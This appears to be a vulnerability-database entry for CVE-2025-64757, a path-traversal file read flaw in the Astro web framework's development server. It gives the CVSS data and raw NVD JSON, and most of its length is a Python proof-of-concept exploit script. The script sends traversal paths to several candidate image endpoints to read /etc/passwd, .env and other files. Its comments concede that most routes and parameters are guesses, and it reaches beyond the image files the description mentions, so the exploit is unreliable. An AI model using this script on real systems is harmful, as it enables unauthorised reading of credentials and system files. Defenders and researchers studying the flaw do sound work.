Security Vulnerability Report
CVE-2025-64757 CVSS 3.5 LOW

CVE-2025-64757

Published: 2025-11-19 17:15:52
Last Modified: 2025-11-20 17:58:22

Description

Astro is a web framework. Prior to version 5.14.3, a vulnerability has been identified in the Astro framework's development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system. This issue has been patched in version 5.14.3.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:astro:astro:*:*:*:*:*:node.js:*:* - VULNERABLE
Astro < 5.14.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64757 PoC - Astro Framework Local File Read
# Affected Version: Astro < 5.14.3
# Attack Vector: Path traversal via image optimization endpoint
#
# Note: the endpoint paths and query parameters probed below are the PoC
# author's guesses and are not taken from the vendor advisory. /_image is the
# route Astro's dev server registers for its built-in image endpoint; the
# other three are speculative fallbacks.
import sys
import urllib.parse

import requests


def exploit_astro_lfi(target_url, file_path):
    """
    Exploit Astro development server local file read vulnerability

    Args:
        target_url: Base URL of the vulnerable Astro dev server
        file_path: Path to the file to read (e.g., ../../../etc/passwd)

    Returns:
        File content if successful, None otherwise
    """
    # Percent-encode the traversal path for use directly in a URL
    encoded_path = urllib.parse.quote(file_path)

    # Candidate routes for the image optimization endpoint; the dev server
    # registers only one, so probe each in turn
    endpoints = [
        f"{target_url}/_image",
        f"{target_url}/@astroimage",
        f"{target_url}/image",
        f"{target_url}/__astro/image",
    ]

    for endpoint in endpoints:
        try:
            # Method 1: GET request with the path in a query parameter
            # (requests encodes the parameter value itself)
            params = {
                "url": file_path,
                "w": "100",
                "h": "100",
            }
            response = requests.get(endpoint, params=params, timeout=10)
            if response.status_code == 200 and len(response.content) > 0:
                print(f"[+] Success! File read via {endpoint}")
                return response.content

            # Method 2: Direct path traversal in URL
            exploit_url = f"{endpoint}?f={encoded_path}"
            response = requests.get(exploit_url, timeout=10)
            if response.status_code == 200:
                print("[+] Success! Direct path traversal worked")
                return response.content

        except requests.exceptions.RequestException as e:
            print(f"[-] Error with {endpoint}: {e}")
            continue

    return None


def main():
    if len(sys.argv) < 3:
        print("Usage: python poc.py <target_url> <file_path>")
        print("Example: python poc.py http://localhost:4321 ../../../etc/passwd")
        sys.exit(1)

    target = sys.argv[1]
    file_path = sys.argv[2]

    print(f"[*] Target: {target}")
    print(f"[*] Attempting to read: {file_path}")

    result = exploit_astro_lfi(target, file_path)

    if result:
        print("\n[+] File Content:")
        print(result.decode("utf-8", errors="ignore"))
    else:
        print("[-] Exploitation failed - target may not be vulnerable or file not accessible")


if __name__ == "__main__":
    main()

# Additional attack examples:
# Read environment file: python poc.py http://target:4321 ../../../.env
# Read package.json:     python poc.py http://target:4321 ../package.json
# Read system file:      python poc.py http://target:4321 ../../../../etc/hosts

References

https://github.com/withastro/astro/commit/b8ca69b97149becefaf89bf21853de9c905cdbb7 (Patch)
https://github.com/withastro/astro/security/advisories/GHSA-x3h8-62x9-952g (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64757", "sourceIdentifier": "[email protected]", "published": "2025-11-19T17:15:52.460", "lastModified": "2025-11-20T17:58:21.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Astro is a web framework. Prior to version 5.14.3, a vulnerability has been identified in the Astro framework's development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system. This issue has been patched in version 5.14.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:astro:astro:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "5.14.3", "matchCriteriaId": "48394CBD-D26B-4176-875E-32B9467D6157"}]}]}], "references": [{"url": "https://github.com/withastro/astro/commit/b8ca69b97149becefaf89bf21853de9c905cdbb7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/withastro/astro/security/advisories/GHSA-x3h8-62x9-952g", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}